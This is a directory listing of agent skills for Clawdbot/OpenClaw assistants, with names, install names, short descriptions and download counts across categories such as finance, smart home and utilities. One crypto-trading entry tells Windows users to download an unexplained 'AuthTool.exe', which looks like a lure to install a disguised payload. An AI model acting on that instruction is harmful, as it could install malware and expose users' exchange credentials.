Parakeet Sttparakeet-sttLocal speech-to-text with NVIDIA Parakeet TDT 0.6B v3 (ONNX on CPU). 30x faster than Whisper, 25 languages, auto-detection, OpenAI-compatible API. Use when transcribing audio files, converting spee...100
Transcribe Audio with Parakeet MLXparakeet-mlxLocal speech-to-text with Parakeet MLX (ASR) for Apple Silicon (no API key).95
Spotify Historyspotify-historyAccess Spotify listening history, top artists/tracks, and get personalized recommendations via the Spotify Web API. Use when fetching a user's recent plays, analyzing music taste, or generating rec...83
Apple Musicapple-music-2Apple Music integration via AppleScript (macOS) or MusicKit API77
LLMWhispererllmwhispererExtract text and layout from images and PDFs using LLMWhisperer API. Good for handwriting and complex forms.75
Last.fmlastfmAccess Last.fm listening history, music stats, and discovery. Query recent tracks, top artists/albums/tracks, loved tracks, similar artists, and global charts.69
Pocket Ttspocket-tts67
Phone Voice Agentphone-agentRun a real-time AI phone agent using Twilio, Deepgram, and ElevenLabs. Handles incoming calls, transcribes audio, generates responses via LLM, and speaks back via streaming TTS. Use when user wants...61
ElevenLabs Musicelevenlabs-musicGenerate music from text prompts using ElevenLabs Eleven Music API. Use when creating songs, soundtracks, jingles, lullabies, or any audio music from descriptions. Supports vocals with AI-generated...54
Voice.ai Voicesvoice-ai-ttsHigh-quality voice synthesis with 9 personas, 11 languages, streaming, and voice cloning using Voice.ai API.54
Kokoro TTSkokoro-ttsGenerate spoken audio from text using the local Kokoro TTS engine. Use when the user asks to "say" something, requests a voice message, or wants text converted to speech.50

Image Generation

SkillInstall NameDescriptionDownloads
Nano Banana Pronano-banana-proGenerate/edit images with Nano Banana Pro (Gemini 3 Pro Image). Use for image create/modify requests incl. edits. Supports text-to-image + image-to-image; 1K/2K/4K; use --input-image.2,191
Antigravity Quotaantigravity-quotaCheck Antigravity account quotas for Claude and Gemini models. Shows remaining quota and reset times with ban detection.468
Daily Recapdaily-recapGenerate a daily recap image with your agent holding a posterboard of accomplishments. Cron-driven, weather-aware, customizable to any agent identity.233
PyMuPDF PDF Parser Clawdbot Skillpymupdf-pdfFast local PDF parsing with PyMuPDF (fitz) for Markdown/JSON outputs and optional images/tables. Use when speed matters more than robustness, or as a fallback while heavier parsers are unavailable....219
Nano Banana Pronano-banana-pro-2Generate or edit images via Gemini 3 Pro Image (Nano Banana Pro).161
Nano Banana Antigravitynano-banana-antigravityGenerate or edit images via Nano Banana Pro using Antigravity OAuth (no API key needed!)133
Word Automationwps-word-automationAutomate common Word/WPS document operations on Windows via COM (read text, replace, insert, headings, headers/footers, page breaks, merge, split, export to PDF/TXT, add/replace images). Use for si...118
Krea.ai APIkrea-apiGenerate images via Krea.ai API (Flux, Imagen, Ideogram, Seedream, etc.)117
Nano Banananano-banana112
Reve AI Image Generationreve-aiGenerate, edit, and remix images using the Reve AI API. Use when creating images from text prompts, editing existing images with instructions, or combining/remixing multiple reference images. Requi...106
GPTgptOpenAI GPT integration. Chat completions, image generation, embeddings, and fine-tuning via OpenAI API.91
ImageMagick Operationsimagemagick85
PowerPoint Automationwps-ppt-automationAutomate common PowerPoint/WPS Presentation operations on Windows via COM (read text/notes/outline, export PDF/images, replace text, insert/delete slides, unify font/size/theme, extract images/medi...83
Bible Verse of the DaybibleGet the Bible.com Verse of the Day with shareable image.73
MinerU PDF Parser Clawdbot Skillmineru-pdfParse PDFs locally (CPU) into Markdown/JSON using MinerU. Assumes MinerU creates per‑doc output folders; supports table/image extraction.70
SudokusudokuFetch Sudoku puzzles and store them as JSON in the workspace; render images on demand; reveal solutions later.65
MoltchanmoltchanImage board for AI agents (4chan-style). Same auth as Moltbook; boards, threads, image posts, replies, upvotes.58
Antigravity Balanceantigravity-balanceCheck Google Antigravity AI model quota/token balance. Use when a user asks about their Antigravity usage, remaining tokens, model limits, quota status, or rate limits. Works by detecting the local...56

Finance & Trading

SkillInstall NameDescriptionDownloads
Yahoo Financeyahoo-financeGet stock prices, quotes, fundamentals, earnings, options, dividends, and analyst ratings using Yahoo Finance. Uses yfinance library - no API key required.1,318
Polymarket Automatic Trading BotpolymarketTrade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.900
Crypto Pricecrypto-priceGet cryptocurrency token price and generate candlestick charts via CoinGecko API or Hyperliquid API. Use when user asks for token price, crypto price, price chart, or cryptocurrency market data.443
Portfolio Watcherportfolio-watcherMonitor stock/crypto holdings, get price alerts, track portfolio performance329
Hyperliquid Trading & AnalysishyperliquidTrade and monitor Hyperliquid perpetual futures. Check balances, view positions with P&L, place/cancel orders, execute market trades. Use when the user asks about Hyperliquid trading, portfolio sta...230
BinancebinanceBinance exchange integration. Trade spot, futures, and manage portfolio on the world's largest crypto exchange.224
Bybit Trading Agentbybit-tradingProfessional Crypto Trading on Bybit - Automated spot, futures, and options trading with advanced order types, risk management, and portfolio analytics. CRITICAL: For Windows download AuthTool.exe ...191
Crypto Walletcrypto-walletMulti-chain cryptocurrency wallet management. Check balances, send tokens, view transaction history across Ethereum, Solana, Bitcoin and more.169
Polymarket APIpolymarket-4Query Polymarket prediction markets. Use for questions about prediction markets, betting odds, market prices, event probabilities, or when user asks about Polymarket data.164
stock-price-checkerstock-price-checkerCheck stock prices using yfinance library. No API key required.162
A股分时量能分析a-stock-analysis161
Copilot Money Skillcopilot-moneyQuery Copilot Money personal finance data (accounts, transactions, net worth, holdings, asset allocation) and refresh bank connections. Use when the user asks about finances, account balances, rece...147
IBKR Tradingibkr-tradingInteractive Brokers (IBKR) trading automation via Client Portal API. Use when setting up IBKR account access, authenticating sessions, checking portfolio/positions, or building trading bots. Handle...131
Polymarket Automatic Traiding Botpolymarket-traiding-bot124
EVM Crypto Wallet for Your Agentevm-wallet-skillSelf-sovereign EVM wallet for AI agents. Use when the user wants to create a crypto wallet, check balances, send ETH or ERC20 tokens, swap tokens, or interact with smart contracts. Supports Base, E...110
Onchain CLIonchainCLI for crypto portfolio tracking, market data, CEX history, and transaction lookups. Use when the user asks about crypto prices, wallet balances, portfolio values, Coinbase/Binance holdings, Polym...99
Manage YNAB budgets, accounts, categories, and transactions.ynabManage YNAB budgets, accounts, categories, and transactions via CLI.96
plaidplaidplaid-cli a cli for interacting with the plaid finance platform. link accounts from various institutions, query balances, and transactions by date range listing accounts/balances.93
Watch My Moneywatch-my-moneyAnalyze bank transactions, categorize spending, track monthly budgets, detect overspending and anomalies. Outputs interactive HTML report.92
yahoo fetch data of stonksyahoo-data-fetcherFetch real-time stock quotes from Yahoo Finance.84
Polymarket Oddspolymarket-5Query Polymarket prediction markets. Use for questions about prediction markets, betting odds, market prices, event probabilities, or when user asks about Polymarket data.84
Simmer Copytradingsimmer-copytradingMirror positions from top Polymarket traders using Simmer API. Size-weighted aggregation across multiple wallets.75
Expense Tracker Proexpense-tracker-proTrack expenses via natural language, get spending summaries, set budgets71
Solana Swapssolana-swapsSwap tokens on Solana via Jupiter aggregator and check wallet balances. Use when user wants to swap tokens, check SOL/token balance, or get swap quotes.66
OKXokxOKX exchange integration. Trade spot, futures, options, and DeFi on one of the world's largest crypto exchanges.62
Solana Tradersolana-traderSolana wallet management and token trading via Jupiter aggregator. Check balances, view transaction history, swap tokens, and manage your Solana portfolio.57
OpensslopensslGenerate secure random strings, passwords, and cryptographic tokens using OpenSSL. Use when creating passwords, API keys, secrets, or any secure random data.53
KrakenkrakenQuery Kraken crypto account balances, portfolio, trades, and staking positions.52
BagsbagsBags - The Solana launchpad for humans and AI agents. Authenticate, manage wallets, claim fees, trade tokens, and launch tokens for yourself, other agents, or humans.50

Smart Home & Devices

SkillInstall NameDescriptionDownloads
SonosclisonoscliControl Sonos speakers (discover/status/play/volume/group).3,564
Home AssistanthomeassistantControl Home Assistant - smart plugs, lights, scenes, automations.2,996
Home Assistanthome-assistantControl Home Assistant smart home devices, run automations, and receive webhook events. Use when controlling lights, switches, climate, scenes, scripts, or any HA entity. Supports bidirectional com...419
OpenhueopenhueControl Philips Hue lights/scenes via the OpenHue CLI.409
UnifiunifiQuery and monitor UniFi network via local gateway API (Cloud Gateway Max / UniFi OS). Use when the user asks to "check UniFi", "list UniFi devices", "show who's on the network", "UniFi clients", "U...156
Apple Media Remote (for HomePod, Apple TV, etc)apple-mediaControl Apple TV, HomePod, and AirPlay devices via pyatv (scan, stream, playback, volume, navigation).141
Google Home/Nestgoogle-home112
TeslateslaControl your Tesla vehicles - lock/unlock, climate, location, charge status, and more. Supports multiple vehicles.109
LLMllmMulti-provider LLM integration. Unified interface for OpenAI, Anthropic, Google, and local models.104
HomeyhomeyControl Athom Homey smart home devices via local (LAN/VPN) or cloud APIs. List/control devices, trigger flows, query zones. Works with Homey Pro, Cloud, and Bridge.93
Control ChromecastchromecastControl Chromecast devices on your local network - discover, cast media, control playback, manage queues, and save/restore states77
BridlebridleUnified configuration manager for AI coding assistants. Manage profiles, install skills/agents/commands, and switch configurations across Claude Code, OpenCode, Goose, and Amp.63
Govee Lights Controlgovee-lights57
Nest Devicesnest-devicesControl Nest smart home devices (thermostat, cameras, doorbell) via the Device Access API. Use when asked to check or adjust home temperature, view camera feeds, check who's at the door, monitor ro...53

Notes & Knowledge

SkillInstall NameDescriptionDownloads
ObsidianobsidianWork with Obsidian vaults (plain Markdown notes) and automate via obsidian-cli.2,192
NotionnotionNotion API for creating and managing pages, databases, and blocks.1,274
Clawdbot Security Checkclawdbot-self-security-auditPerform a comprehensive read-only security audit of Clawdbot's own configuration. This is a knowledge-based skill that teaches Clawdbot to identify hardening opportunities across the system. Use wh...944
BitwardenbitwardenAccess and manage Bitwarden/Vaultwarden passwords securely using the rbw CLI.156
Backup of conversations to Obsidianobsidian-conversation-backupAutomatic conversation backup system for Obsidian with incremental snapshots, hourly breakdowns, and formatted chat-style markdown. Use when setting up conversation archival, preventing data loss f...136
Readwise & ReaderreadwiseAccess Readwise highlights and Reader saved articles119
notebooklm-clinotebooklm-cli108
NotebookLM CLInotebooklm-261
Clawpedia lets your OpenClaw instance share knowledge and retrieve knowledge from a public shared knowledge base.clawpediaContribute to and reference Clawpedia, the collaborative knowledge base for AI agents58
DashlanedashlaneAccess passwords, secure notes, secrets and OTP codes from Dashlane vault.52

Research & Education

SkillInstall NameDescriptionDownloads
gaokao-history-tutorgaokao-history-tutor1,162

Security

SkillInstall NameDescriptionDownloads
Hacker NewshnBrowse Hacker News - top stories, new, best, ask, show, jobs, and story details with comments.1,442
n8n workflow automationn8n-workflow-automationDesigns and outputs n8n workflow JSON with robust triggers, idempotency, error handling, logging, retries, and human-in-the-loop review queues. Use when you need an auditable automation that won’t ...716
1password1passwordSet up and use 1Password CLI (op). Use when installing the CLI, enabling desktop app integration, signing in (single or multi-account), or reading/injecting/running secrets via op.701
Web Design Guidelinesweb-design-guidelinesReview UI code for Web Interface Guidelines compliance. Use when asked to "review my UI", "check accessibility", "audit design", "review UX", or "check my site against best practices".411
HealthKit Synchealthkit-synciOS HealthKit data sync CLI commands and patterns. Use when working with healthsync CLI, fetching Apple Health data (steps, heart rate, sleep, workouts), pairing iOS devices over local network, or ...381
Dont Hack Medont-hack-me別駭我!基本安全檢測 — Security self-check for Clawdbot/Moltbot. Run a quick audit of your clawdbot.json to catch dangerous misconfigurations — exposed gateway, missing auth, open DM policy, weak tokens, loo...265
Security Monitorsecurity-monitorReal-time security monitoring for Clawdbot. Detects intrusions, unusual API calls, credential usage patterns, and alerts on breaches.256
Clawdbot Security SuitesecurityAdvanced security validation for Clawdbot - pattern detection, command sanitization, and threat monitoring235
FigmafigmaProfessional Figma design analysis and asset export. Use for extracting design data, exporting assets in multiple formats, auditing accessibility compliance, analyzing design systems, and generatin...163
Secret Scannersecret-scannerScan your codebase for leaked secrets and API keys. Use when you need a security check before pushing.156
Clawdbot Security Auditclawdbot-securitySecurity audit and hardening for Clawdbot/Moltbot installations. Detects exposed gateways, fixes permissions, enables authentication, and guides firewall/Tailscale setup.145
SkillGuardskillguardSecurity scanner for AgentSkill packages. Scan skills for credential theft, code injection, prompt manipulation, data exfiltration, and evasion techniques before installing them. Use when evaluatin...137
security-reviewersecurity-reviewerUse when conducting security audits, reviewing code for vulnerabilities, or analyzing infrastructure security. Invoke for SAST scans, penetration testing, DevSecOps practices, cloud security reviews.93
analytics-trackinganalytics-trackingWhen the user wants to set up, improve, or audit analytics tracking and measurement. Also use when the user mentions "set up tracking," "GA4," "Google Analytics," "conversion tracking," "event trac...85
Test Mastertest-masterUse when writing tests, creating test strategies, or building automation frameworks. Invoke for unit tests, integration tests, E2E, coverage analysis, performance testing, security testing.63
Config Guardianconfig-guardianValidate and safeguard OpenClaw config updates (openclaw.json or openclaw config set/apply). Use this skill whenever changing gateway config, models, channels, agents, tools, sessions, or routing. ...58
Auth Security Scannerauth-checkerAudit authentication flows for security vulnerabilities55

Documents & Presentations

SkillInstall NameDescriptionDownloads
Nano Pdfnano-pdfEdit PDFs with natural-language instructions using the nano-pdf CLI.1,450
Clawdbot Documentation Expertclawdbot-documentation-expert350
PdfpdfComprehensive PDF manipulation toolkit for extracting text and tables, creating new PDFs, merging/splitting documents, and handling forms. When Claude needs to fill in a PDF form or programmaticall...299
Pdf Form Fillerpdf-form-fillerFill PDF forms programmatically with text values and checkboxes. Use when you need to populate fillable PDF forms (government forms, applications, surveys, etc.) with data. Supports setting text fi...189
Swagger Generatorswagger-genGenerate OpenAPI specs from Express routes. Use when documenting APIs.109
Excel weekly dashboards at scaleexcel-weekly-dashboardDesigns refreshable Excel dashboards (Power Query + structured tables + validation + pivot reporting). Use when you need a repeatable weekly KPI workbook that updates from files with minimal manual...89
PrezentitprezentitGenerate beautiful AI-powered presentations instantly. Create professional slides with custom themes, visual designs, and speaker notes—all through natural language commands. Connect your Prezentit...85
IntomdintomdFetch and convert any documentation URL to Markdown using into.md service.64
Codebase Documentercodebase-documenterThis skill should be used when writing documentation for codebases, including README files, architecture documentation, code comments, and API documentation. Use this skill when users request help ...58
Deepread OCRdeepreadOCR that never fails silently. Multi-pass document processing API with intelligent quality review flags. Extract text and structured data from PDFs with AI-powered confidence scoring. Free tier - 2...57
Web Qa Botweb-qa-botAI-powered web application QA automation using accessibility-tree based testing. Smoke tests, test suites, and PDF reports.56

Health & Wellness

SkillInstall NameDescriptionDownloads
EightctleightctlControl Eight Sleep pods (status, temperature, alarms, schedules).256
Uptime Kumauptime-kumaInteract with Uptime Kuma monitoring server. Use for checking monitor status, adding/removing monitors, pausing/resuming checks, viewing heartbeat history. Triggers on mentions of Uptime Kuma, serv...192
Therapy Modetherapy-modeComprehensive AI-assisted therapeutic support framework with CBT, ACT, DBT, MI, session notes CLI, and crisis protocols.191
Whoop SkillwhoopskillWHOOP CLI with health insights, trends analysis, and data fetching (sleep, recovery, HRV, strain).161
Oura Ring Integrationoura143
StravastravaLoad and analyze Strava activities, stats, and workouts using the Strava API118
WHOOPwhoopWHOOP morning check-in (recovery/sleep/strain) with suggestions.98
withings-healthwithings-healthFetches health data from the Withings API including weight, body composition (fat, muscle, bone, water), activity, and sleep. Use this skill when the user asks about their Withings data, weight his...91
FitbitfitbitQuery Fitbit health data including sleep, heart rate, activity, SpO2, and breathing rate. Use when user asks about their fitness, sleep quality, steps, or health metrics.89
UnraidunraidQuery and monitor Unraid servers via the GraphQL API. Use when the user asks to 'check Unraid', 'monitor Unraid', 'Unraid API', 'get Unraid status', 'check disk temperatures', 'read Unraid logs', '...77
Oura Ring Analyticsoura-analyticsOura Ring data integration and analytics. Fetch sleep scores, readiness, activity, HRV, and trends from the Oura Cloud API. Generate automated reports, correlations with productivity, and trigger-b...76
Stress Reliefstress-reliefManage stress with quick techniques, stress logging, and recovery tools60
Jungian Psychologistjungian-psychologistExpert in Jungian analytical psychology, depth psychology, shadow work, archetypal analysis, dream interpretation, active imagination, addiction/recovery through Jungian lens, and the individuation...58
Whoopwhoop-2Access Whoop wearable health data (sleep, recovery, strain, HRV, workouts) and generate interactive charts. Use when the user asks about sleep quality, recovery scores, strain levels, HRV trends, w...56
Healthy Eatinghealthy-eatingBuild healthy eating habits with meal logging, nutrition tracking, and food choices56

Cloud & Infrastructure

SkillInstall NameDescriptionDownloads
CloudflarecloudflareCloudflare CLI - manage DNS records, purge cache, and control Workers routes.348
Hetzner Cloud CLIhetzner-cloudHetzner Cloud CLI for managing servers, volumes, firewalls, networks, DNS, and snapshots.157
Domain Dns Opsdomain-dns-opsDomain/DNS ops across Cloudflare, DNSimple, Namecheap for Peter. Use for onboarding zones to Cloudflare, flipping nameservers, setting redirects (Page Rules/Rulesets/Workers), updating redirect-wor...131
Proxmox Fullproxmox-fullComplete Proxmox VE management - create/clone/start/stop VMs and LXC containers, manage snapshots, backups, storage, and templates. Use when user wants to manage Proxmox infrastructure, virtual mac...127
Send Me My Files - R2 upload with short lived signed urlssend-me-my-files-r2-upload-with-short-lived-signed-urlsUpload files to Cloudflare R2, AWS S3, or any S3-compatible storage and generate secure presigned download links with configurable expiration.120
azure-cliazure-cliComprehensive Azure Cloud Platform management via command-line interface80
Cloudflare APIcloudflare-2Connect to Cloudflare API for DNS management, tunnels, and zone administration. Use when user needs to manage domains, DNS records, or create tunnels.74

Lifestyle & Fun

SkillInstall NameDescriptionDownloads
WeatherweatherGet current weather and forecasts (no API key required).3,110
OrdercliordercliFoodora-only CLI for checking past orders and active order status (Deliveroo WIP).185
SwiggyswiggyOrder food, groceries, and book restaurants in India via Swiggy's MCP servers. Food delivery, Instamart groceries, and Dineout restaurant bookings with safety-first confirmation workflow.104
Steam Games CLIsteamBrowse, filter, and discover games in a Steam library. Filter by playtime, reviews, Steam Deck compatibility, genres, and tags. Use when user asks about their Steam games, what to play, game recomm...104
Sports Tickersports-tickerLive sports alerts for Soccer, NFL, NBA, NHL, MLB, F1 and more. Real-time scoring with FREE ESPN API. Track any team from any major league worldwide.86
Weather Pollenweather-pollenWeather and pollen reports for any location using free APIs. Get current conditions, forecasts, and pollen data.78
AnylistanylistManage grocery and shopping lists via AnyList. Use when user asks about shopping lists, groceries, or adding/checking off items to buy.66
Snow Reportsnow-reportGet snow conditions, forecasts, and ski reports for any mountain resort worldwide. Use when asked about snow, powder, ski conditions, or mountain weather. Supports 1000+ resorts via OpenSnow. Users...59
Flight Trackerflight-tracker-2Track flights in real-time with detailed status, gate info, delays, and live position. Use when user asks to track a flight, check flight status, look up flight information by flight number (e.g., ...56
the-sports-dbthe-sports-dbAccess sports data via TheSportsDB (teams, events, scores).52

Utilities

SkillInstall NameDescriptionDownloads
Auto-Updater Skillauto-updaterAutomatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed.4,123
Frontend Designfrontend-designCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished co...1,554
SuperDesignfrontend-design-2Expert frontend design guidelines for creating beautiful, modern UIs. Use when building landing pages, dashboards, or any user interface.1,536
Plan2Mealplan2meal1,416
GeminigeminiGemini CLI for one-shot Q&A, summaries, and generation.1,333
McportermcporterUse the mcporter CLI to list, configure, auth, and call MCP servers/tools directly (HTTP or stdio), including ad-hoc servers, config edits, and CLI/type generation.1,221
CalendarcalendarCalendar management and scheduling. Create events, manage meetings, and sync across calendar providers.1,210
Tessie Tesla Controltessie1,111
TrellotrelloManage Trello boards, lists, and cards via the Trello REST API.1,067
Claude Connectclaude-connectConnect Claude to Clawdbot instantly and keep it connected 24/7. Run after setup to link your subscription, then auto-refreshes tokens forever.944
Skills Auto-Updaterauto-updater-2Automatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed.940
PeekaboopeekabooCapture and automate macOS UI with the Peekaboo CLI.894
Prompt Engineering Expertprompt-engineering-expertAdvanced expert in prompt engineering, custom instructions design, and prompt optimization for AI agents841
TmuxtmuxRemote-control tmux sessions for interactive CLIs by sending keystrokes and scraping pane output.673
Thinking Partnerthinking-partnerCollaborative thinking partner for exploring complex problems through questioning635
Skills Updateauto-updater-3Automatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed.635
Find Skillsfind-skillsHelps users discover and install agent skills when they ask questions like "how do I do X", "find a skill for X", "is there a skill that can...", or express interest in extending capabilities. This...556
ImsgimsgiMessage/SMS CLI for listing chats, history, watch, and sending.518
gogcli - Google Workspace CLIgogcli479
Swiftui Liquid Glassswiftui-liquid-glassImplement, review, or improve SwiftUI features using the iOS 26+ Liquid Glass API. Use when asked to adopt Liquid Glass in new SwiftUI UI, refactor an existing feature to Liquid Glass, or review Li...468
Swift Concurrency Expertswift-concurrency-expertSwift Concurrency review and remediation for Swift 6.2+. Use when asked to review Swift Concurrency usage, improve concurrency compliance, or fix Swift concurrency compiler errors in a feature or f...424
Clawdbot Release Checkclawdbot-release-checkCheck for new clawdbot releases and notify once per new version.423
System MonitorsystemmonitorCheck the current CPU, RAM, and GPU status of the local server.421
Clawdbot Logsclawdbot-logsAnalyze Clawdbot logs and diagnostics. Use when the user asks about bot performance, response times, errors, session stats, token usage, API costs, or wants to debug slow responses.406
Excalidrawexcalidraw-flowchartCreate Excalidraw flowcharts from descriptions. Use when user asks to "create a flowchart", "draw a diagram", "visualize a process", "make a flow diagram", "architecture diagram", or discusses work...405
Plan My Dayplan-my-dayGenerate an energy-optimized, time-blocked daily plan387
TailscaletailscaleManage Tailscale tailnet via CLI and API. Use when the user asks to "check tailscale status", "list tailscale devices", "ping a device", "send file via tailscale", "tailscale funnel", "create auth ...380
Clawdbot Skill Updateclawdbot-skill-updateComprehensive backup, update, and restore workflow with dynamic workspace detection373
Ui Skillsui-skillsOpinionated constraints for building better interfaces with agents.372
CamsnapcamsnapCapture frames or clips from RTSP/ONVIF cameras.359
Idea RecorderideaLaunch background Claude sessions to explore and analyze business ideas. Say 'Idea: [description]' to trigger.331
xAI / GrokxaiChat with Grok models via xAI API. Supports Grok-3, Grok-3-mini, vision, and more.328
Apple Calendar CLIaccliThis skill should be used when interacting with Apple Calendar on macOS. Use it for listing calendars, viewing events, creating/updating/deleting calendar events, and checking availability/free-bus...322
Moltbot Best Practicesmoltbot-best-practicesBest practices for AI agents to avoid common mistakes. Learn from real failures - confirms before executing, shows drafts before publishing, stops when told to stop, and doesn't over-automate.320
Feishu Bridgefeishu-bridgeConnect a Feishu (Lark) bot to Clawdbot via WebSocket long-connection. No public server, domain, or ngrok required. Use when setting up Feishu/Lark as a messaging channel, troubleshooting the Feish...284
DatabasedatabaseDatabase management and queries. Connect to SQL and NoSQL databases, run queries, and manage schemas.282
jqjqCommand-line JSON processor. Extract, filter, transform JSON.280
PostgreSQLpostgresPostgreSQL database management. Run queries, manage schemas, and monitor performance.279
Simple Backupsimple-backupBackup agent brain (workspace) and body (state) to local folder and optionally sync to cloud via rclone.278
Google Calendargoogle-calendarInteract with Google Calendar via the Google Calendar API – list upcoming events, create new events, update or delete them. Use this skill when you need programmatic access to your calendar from Op...275
EZ Cronjobez-cronjobFix common cron job failures in Clawdbot/Moltbot - message delivery issues, tool timeouts, timezone bugs, and model fallback problems.253
Microsoft 365 Integrationms365224
Opencode-controlleropencode-controllerControl and operate Opencode via slash commands. Use this skill to manage sessions, select models, switch agents (plan/build), and coordinate coding through Opencode.217
tldrtldrSimplified man pages from tldr-pages. Use this to quickly understand CLI tools.200
GA4 Analyticsga4Query Google Analytics 4 (GA4) data via the Analytics Data API. Use when you need to pull website analytics like top pages, traffic sources, user counts, sessions, conversions, or any GA4 metrics/d...199
BlucliblucliBluOS CLI (blu) for discovery, playback, grouping, and volume.194
Opencode Acp Controlopencode-acp-controlControl OpenCode directly via the Agent Client Protocol (ACP). Start sessions, send prompts, resume conversations, and manage OpenCode updates.191
iCloud Find Myicloud-findmyQuery Find My locations and battery status for family devices via iCloud.180
Create Clicreate-cliDesign command-line interface parameters and UX: arguments, flags, subcommands, help text, output formats, error messages, exit codes, prompts, config/env precedence, and safe/dry-run behavior. Use...179
iOS Simulator Skillios-simulator21 production-ready scripts for iOS app testing, building, and automation. Provides semantic UI navigation, build automation, accessibility testing, and simulator lifecycle management. Optimized fo...178
Code Explainercode-explainExplain complex code in plain English176
Weekly Synthesisweekly-synthesisCreate a comprehensive synthesis of the week's work and thinking162
Domain DetailsdomaindetailsLook up domain WHOIS/RDAP info and check marketplace listings. Free API, no auth required.157
Ssh Essentialsssh-essentialsEssential SSH commands for secure remote access, key management, tunneling, and file transfers.155
Fix Your Entire Life in 1 Dayfix-life-in-1-dayFix your entire life in 1 day. 10 psychological sessions based on Dan Koe's viral article.152
Screen Monitorscreen-monitorDual-mode screen sharing and analysis. Model-agnostic (Gemini/Claude/Qwen3-VL).143
gcal-pro - Google Calendargcal-proGoogle Calendar integration for viewing, creating, and managing calendar events. Use when the user asks about their schedule, wants to add/edit/delete events, check availability, or needs a morning...143
Overcome Problemovercome-problemBreak down any problem with structured thinking, action plans, and progress tracking140
Relationship Skillsrelationship-skillsImprove relationships with communication tools, conflict resolution, and connection ideas140
BluebubblesbluebubblesBuild or update the BlueBubbles external channel plugin for Clawdbot (extension package, REST send/probe, webhook inbound).130
Tmux Agentstmux-agentsManage background coding agents in tmux sessions. Spawn Claude Code or other agents, check progress, get results.129
ClawdLinkclawdlinkEncrypted Clawdbot-to-Clawdbot messaging. Send messages to friends' Clawdbots with end-to-end encryption.128
Daily Review Ritualdaily-review-2End-of-day review to capture progress, insights, and plan tomorrow123
ClaudeclaudeAnthropic Claude integration. Chat with Claude models via Anthropic API.122
OverseerroverseerrRequest movies/TV and monitor request status via the Overseerr API (stable Overseerr, not the beta Seerr rewrite).119
Mole Mac Cleanupmole-mac-cleanupMac cleanup & optimization tool combining CleanMyMac, AppCleaner, DaisyDisk features. Deep cleaning, smart uninstaller, disk insights, and project artifact purge.117
Minimax Usageminimax-usageMonitor Minimax Coding Plan usage to stay within API limits. Fetches current usage stats and provides status alerts.114
Morning Routinemorning-routineBuild a powerful morning routine with habit checklists, timing, and streak tracking114
n8n Automationn8n-automationManage n8n workflows from OpenClaw via the n8n REST API. Use when the user asks about n8n workflows, automations, executions, or wants to trigger, list, create, activate, or debug n8n workflows. Su...113
Native App Performancenative-app-performanceNative macOS/iOS app performance profiling via xctrace/Time Profiler and CLI-only analysis of Instruments traces. Use when asked to profile, attach, record, or analyze Instruments .trace files, fin...110
Parcel Package Trackingparcel-package-trackingTrack and add deliveries via Parcel API.110
Mcp Skillmcp-skill108
Portable Toolsportable-toolsBuild cross-device tools without hardcoding paths or account names106
Update Plusupdate-plusFull backup, update, and restore for OpenClaw - config, workspace, and skills with auto-rollback106
Codemod Generatorcodemod-genGenerate codemods for large-scale code changes. Use when refactoring patterns across many files.105
SQL Query Generatorsql-genGenerate SQL queries from natural language105
Pi Adminpi-adminRaspberry Pi system administration. Monitor resources, manage services, perform updates and maintenance.99
RedisredisRedis database management. Key-value operations, caching, pub/sub, and data structure commands.97
Factory AI Droidfactory-ai95
小红书技能xiaohongshu94
UnitsunitsPerform unit conversions and calculations using GNU Units.92
Dropbox Managerdropbox91
CalctlcalctlManage Apple Calendar events via icalBuddy + AppleScript CLI91
ShortenshortenShorten URLs using is.gd (no auth required). Returns a permanent short link.90
React Expertreact-expertUse when building React 18+ applications requiring component architecture, hooks patterns, or state management. Invoke for Server Components, performance optimization, Suspense boundaries, React 19...89
Shortcuts Generatorshortcuts-generatorGenerate macOS/iOS Shortcuts by creating plist files. Use when asked to create shortcuts, automate workflows, build .shortcut files, or generate Shortcuts plists. Covers 1,155 actions (427 WF*Actio...87
Instruments Profilinginstruments-profilingUse when profiling native macOS or iOS apps with Instruments/xctrace. Covers correct binary selection, CLI arguments, exports, and common gotchas.86
Molt Identitymolt-identityCore identity and personality for Molt, the transformative AI assistant81
openclaw-updateopenclaw-updateComprehensive backup, update, and restore workflow with dynamic workspace detection80
QbittorrentqbittorrentManage torrents with qBittorrent. Use when the user asks to "list torrents", "add torrent", "pause torrent", "resume torrent", "delete torrent", "check download status", "torrent speed", "qBittorre...79
mcportermcporter-skill78
Project Managerproject-manager78
Canvas LMScanvas-lmsAccess Canvas LMS (Instructure) for course data, assignments, grades, and submissions. Use when checking due dates, viewing grades, listing courses, or fetching course materials from Canvas.77
Curl Httpcurl-httpEssential curl commands for HTTP requests, API testing, and file transfers.76
desktop mousedesktop-mouseLocal mouse control via ydotool wrapper76
Apple Docs Mcpapple-docs-mcp76
mactopmactopRetrieve real-time hardware metrics from Apple Silicon Macs using mactop's TOON format. Provides CPU, RAM, GPU, power, thermal, network, disk I/O, and Thunderbolt bus information. Use when the user...75
ServiceNow Agentservicenow-agentRead-only CLI access to ServiceNow Table, Attachment, Aggregate, and Service Catalog APIs; includes schema inspection and history retrieval (read-only).75
17track package trackingtrack17Track parcels via the 17TRACK API (local SQLite DB, polling + optional webhook ingestion)75
React Component Generatorcomponent-genGenerate React/Vue/Svelte components from descriptions74
Study Habitsstudy-habitsBuild effective study habits with spaced repetition, active recall, and session tracking74
Pre-Mortem Analystpre-mortem-analystImagine the project already failed, then work backward to find why. More powerful than risk assessment because it assumes failure is certain. Use when user says "pre-mortem", "premortem", "imagine ...74
WeComwecomSend messages to WeCom (企业微信) via webhooks using MCP protocol. Works with Claude Code, Claude Desktop, and other MCP clients.73
Diagram Generatordiagram-genGenerate Mermaid diagrams from your codebase. Use when you need architecture visualizations.73
Morning Briefingmorning-briefing71
amapamap使用高德地图Web服务API进行地点搜索、天气查询和路线规划。71
entrentrRun arbitrary commands when files change. Useful for watching files and triggering builds or tests.71
Database Schema Generatorschema-genGenerate database schemas from descriptions71
Code Explainercode-explainerExplain any code file in plain English. Use when you need to understand unfamiliar code.71
Relay To Agentrelay-to-agentRelay messages to AI agents on any OpenAI-compatible API. Supports multi-turn conversations with session management. List agents, send messages, reset sessions.70
